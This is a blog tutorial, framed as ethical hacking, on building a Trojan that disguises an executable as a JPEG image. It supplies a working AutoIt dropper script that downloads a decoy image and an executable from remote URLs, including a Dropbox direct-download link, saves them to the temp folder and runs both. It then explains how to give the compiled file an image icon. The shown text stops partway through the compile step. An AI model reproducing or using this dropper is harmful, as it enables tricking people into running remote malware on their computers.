How I created a Trojan Malware — Ethical Hacking
A Trojan horse (or Trojan) is one of the most common and dangerous types of threats that can infect your computer or mobile device.
What is trojan malware?
Trojan malware, when opened appears to be a legitimate file opened by the user like opening an image or a document or playing a media file, but in the background, it will run some evil process like someone may be gaining access to your computer through a backdoor or injecting some other harmful code.
Creating my trojan malware
In this blog, I will show you how I combined my executable file with an image file, and when opened, it was able to display the image when a target person opened it, but at the same time, the executable ran in the background. In simple words, I hid my .exe file in a .jpg image file.
This method can be extended to any file type like image, pdf, music, and so on. The executable in most cases is a virus or a backdoor used to gain access to the target computer. Let’s look at the steps:
1. Get a direct URL for the image and the .exe file
The .exe the executable file needs to be present on a publicly available URL from where it is directly downloaded by the browser. I have uploaded the executable on dropbox for this purpose. In the case of dropbox, modifying the end part of the sharable link to dl=1 will allow the browser to directly download the file. The link I have shared below does not contain any code and is actually an empty file, so it is safe for you to test the behavior of this link.
URL for the .exe executable: https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1
URL for my image: https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg
Image of a sports complex
I have used the image of the sports complex as a cover.
2. Using the URLs in a script
#include <StaticConstants.au3> #include <WindowsConstants.au3>
Local $urls = "url1,url2"
Local $urlsArray = StringSplit($urls, ",", 2 )
For $url In $urlsArray $sFile = _DownloadFile($url) shellExecute($sFile)
Func _DownloadFile($sURL) Local $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet($sURL, $sDirectory, 17, 1) InetClose($hDownload) Return $sDirectory EndFunc ;==>_GetURLImage
In the above code, in line number 3, replace url1 with the URL of the image and url2 with the URL of the executable file. My final code looks like this
#include <StaticConstants.au3> #include <WindowsConstants.au3> Local $urls = "https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg,https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1" Local $urlsArray = StringSplit($urls, ",", 2 ) For $url In $urlsArray $sFile = _DownloadFile($url) shellExecute($sFile) Next Func _DownloadFile($sURL) Local $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet($sURL, $sDirectory, 17, 1) InetClose($hDownload) Return $sDirectory EndFunc ;==>_GetURLImage
Save the file with an extension .au3 . I have named the file trojan.au3 .
3. Creating an icon for the file
Since I am using an image as a cover file, Windows usually shows the thumbnail of the image as a file icon, so I will use the sports complex image as an icon and convert it to .ico format. You can google for it and you will find a number of tools to do it. I used this website for it – https://cloudconvert.com/jpg-to-ico
4. Compiling the script
The script is written in a scripting language called AutoIt . To install AutoIt in Ubuntu, you can install wine and install AutoIt , or if you want a straightforward way, install Veil from the steps mentioned here https://www.javatpoint.com/installing-veil. AutoIt will be installed in one of the steps after which you can exit the installation.
Open the Compile AutoIt app. The window should look something like the box shown below. Enter the location of the trojan.au3 file and the path of the .ico file.